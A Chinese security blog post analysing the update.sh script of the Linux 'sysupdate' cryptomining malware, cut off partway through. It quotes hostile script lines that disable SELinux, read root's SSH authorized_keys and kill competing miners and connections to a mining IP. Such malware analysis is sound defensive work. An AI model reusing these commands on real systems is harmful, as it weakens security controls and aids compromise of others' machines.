linux update.sh,Linux系统sysupdate挖矿病毒之update.sh脚本分析 | CN-SEC 中文网

这是第二次遇到该挖矿病毒,网上也有很多大佬对该病毒做过分析,也想过再写可能没有什么意义,最终还是想写一写属于自己的东西,也算是两次相遇的总结。

背景

这次废话不多说,直接上,背景感觉毫无意义。

分析

现象确认

首先确认现象,通过查看系统进程发现存在CPU占用过高的现象,如下图:

9f12fc1950e8cd2adf4a6136c07bac84.png

查看进程信息:

d9df609fc3d03b6dbefbc85cfc4b7847.png

进程关联查看,发现该病毒启动时间是在2020.09.18 10:00:01。

1d282eae011c8567eaa35c762072edfb.png

update.sh脚本分析

通过对程序进行分析,发现该病毒程序同路径下存在update.sh文件(/etc/update.sh),通过对该文件进行分析,发现该文件为挖矿病毒执行的脚本文件,因此对该脚本文件进行分析。

8e6adf1586624a363887a3dfbdc2756b.png

定义系统变量

关闭selinux防火墙,隐藏输出的错误信息,如果有错误信息就输出到空设备2>/dev/null空设备:

setenforce 0 2>dev/null

关闭selinux:

echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

把内容同步写入磁盘

sync && echo 3 >/proc/sys/vm/drop_caches

设置变量:

crondir='/var/spool/cron/'"$USER"cont=`cat ${crondir}`

查看ssh公钥信息

ssht=`cat /root/.ssh/authorized_keys` #ssht = cat /root/.ssh/authorized_keys

关闭相关病毒程序

使用ps auxf查看所有进程,并针对kinsiing进行查找,awk是tab分割,print $2是取出第二个单词,ps auxf查看进程中第二单词为PID(这里关闭的进程较多,只列举其中一些):

ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I %

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值